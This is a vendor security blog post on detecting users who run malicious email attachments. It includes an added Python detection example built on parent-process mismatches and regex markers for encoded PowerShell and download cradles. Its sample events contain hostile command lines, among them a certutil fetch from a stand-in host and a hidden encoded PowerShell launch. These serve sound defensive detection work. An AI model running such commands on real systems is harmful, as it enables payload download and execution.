Monitoring Users Opening Malicious Files – Security Spotlight

The ‘Security Spotlight’ series of blogs accompanies the YouTube series of the same name, which aims to provide quick visibility into, and understanding of, how you can leverage the LogRhythm platform against a variety of threats.

In this Security Spotlight, we’ll be talking about how you can monitor for users unwittingly executing malicious files (MITRE Technique T1204.002).

What are malicious files?

When an attacker looks to execute the initial access phase of an attack through techniques such as spearphishing, they can utilize various attachment files for payload execution, with the most popular choices being PDF, XLS, EXE, and DOC. An attacker’s objective for this phase of the attack is to entice the user to open the file, allowing the malicious code within to run rampant on the target machine.

To achieve this, attackers will devise a way to deceive the end user – by obfuscating the true nature of a malicious file and masquerading it as something legitimate. Attacks like this succeed far more often when they are part of a targeted social engineering campaign, as the probability of the user opening the file and allowing the malicious code to run skyrockets. To add fuel to the fire, while the primary method of execution involves immediately triggering the malicious code, attackers can also choose to drop these types of files in a shared directory or on a user’s desktop. All that is left, then, is to wait for the user to unwittingly click and open the file.

Why develop a response process?

The reality is that even with the most robust and mature security processes, there will always be a human element to business. With said human element comes the potential for manipulation and mistakes.

Recognizing that education, while undoubtedly essential, is not 100% effective is key to developing appropriate response processes for these end-user-targeted attack vectors. Implementing these response processes is imperative, as all it takes is one misclick or one curious user opening a malicious file for code to run and cause things to go up in flames.

Look at the MGM hack that happened just last week. While it wasn’t necessarily a malicious file that triggered the attack, social engineering undoubtedly played a crucial role in gaining access to the environment as attackers spoofed a real employee on a support call.

How can LogRhythm help?

The LogRhythm Co-Pilot team has created a rule to monitor for malicious file execution based on threat emulation tests done using the Red Canary framework. This allowed for a comprehensive rule to be created – one that maps against various potential malicious executions. This comprehensiveness can definitely be expanded through additional testing using tools like MITRE Caldera or collaborating with red teams.

LogRhythm has seen a growing trend in the market of attackers bypassing or turning off EDR tools as part of the initial access phase. Hence, the requirement for increased OS-level logging is clear. Centralizing workstation visibility either directly or through implementing something akin to Windows Event Forwarding is becoming increasingly essential.

The rule focuses on monitoring process creation logs that include the command line, looking for instances where a mismatch exists between the expected process and parent process names, along with regular expressions to identify key markers of malicious code execution.
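To make the two detection conditions concrete, here is an added example (not the LogRhythm Co-Pilot rule itself) that runs a parent/child mismatch check and a set of command-line markers over a few constructed process-creation events. The parent/child pairs and the regular expressions are illustrative assumptions chosen for this example, not the rule's actual content.

```python
import re

# Assumed parent/child pairs: document-handling applications that should not
# normally spawn script hosts or LOLBins. Illustrative, not the shipped rule.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Assumed command-line markers in the style of public Sigma rules, case-insensitive.
MARKERS = {
    "encoded_powershell": re.compile(r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I),
    "download_cradle": re.compile(r"\b(IEX|Invoke-Expression|DownloadString|DownloadFile)\b", re.I),
    "certutil_fetch": re.compile(r"\bcertutil(\.exe)?\s+.*-urlcache\b", re.I),
}

# Constructed sample events (Sysmon Event ID 1 / Windows 4688 style), trimmed to
# the fields the check needs. Paths, users and hosts are made up for this example.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "process": "WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\WINWORD.EXE" /n "C:\Users\jdoe\Downloads\invoice.docx"'},
    {"parent": "WINWORD.EXE", "process": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc AAAAAAAAAAAAAAAAAAAAAAAA"},
    {"parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": "AcroRd32.exe", "process": "cmd.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -split -f http://files.example.invalid/update.bin update.bin"},
    {"parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": r"powershell.exe -w hidden -File C:\Users\jdoe\AppData\Local\Temp\setup.ps1"},
]

def evaluate(event):
    """Return the findings for one process-creation event; an empty list means no hit."""
    parent, child = event["parent"].lower(), event["process"].lower()
    findings = []
    if parent in DOCUMENT_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"parent_mismatch:{parent}->{child}")
    findings += [f"marker:{name}" for name, rx in MARKERS.items() if rx.search(event["cmdline"])]
    return findings

def triage(events):
    """Return (process, severity, findings) for each alerting event.
    Severity is 'high' when both a parent mismatch and a marker fire, else 'medium'."""
    alerts = []
    for ev in events:
        findings = evaluate(ev)
        if not findings:
            continue
        mismatch = any(f.startswith("parent_mismatch") for f in findings)
        marker = any(f.startswith("marker") for f in findings)
        alerts.append((ev["process"], "high" if mismatch and marker else "medium", findings))
    return alerts
```

A benign Office launch and a scheduled script run produce no findings, while the Office-spawned shell and the reader-spawned certutil fetch are scored high because both conditions fire together.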

For more information on how to enable these rules within your LogRhythm deployment, check out our community page to read more, download, and then import the rule into your platform.

For other Security Spotlight episodes, you can access the full playlist here.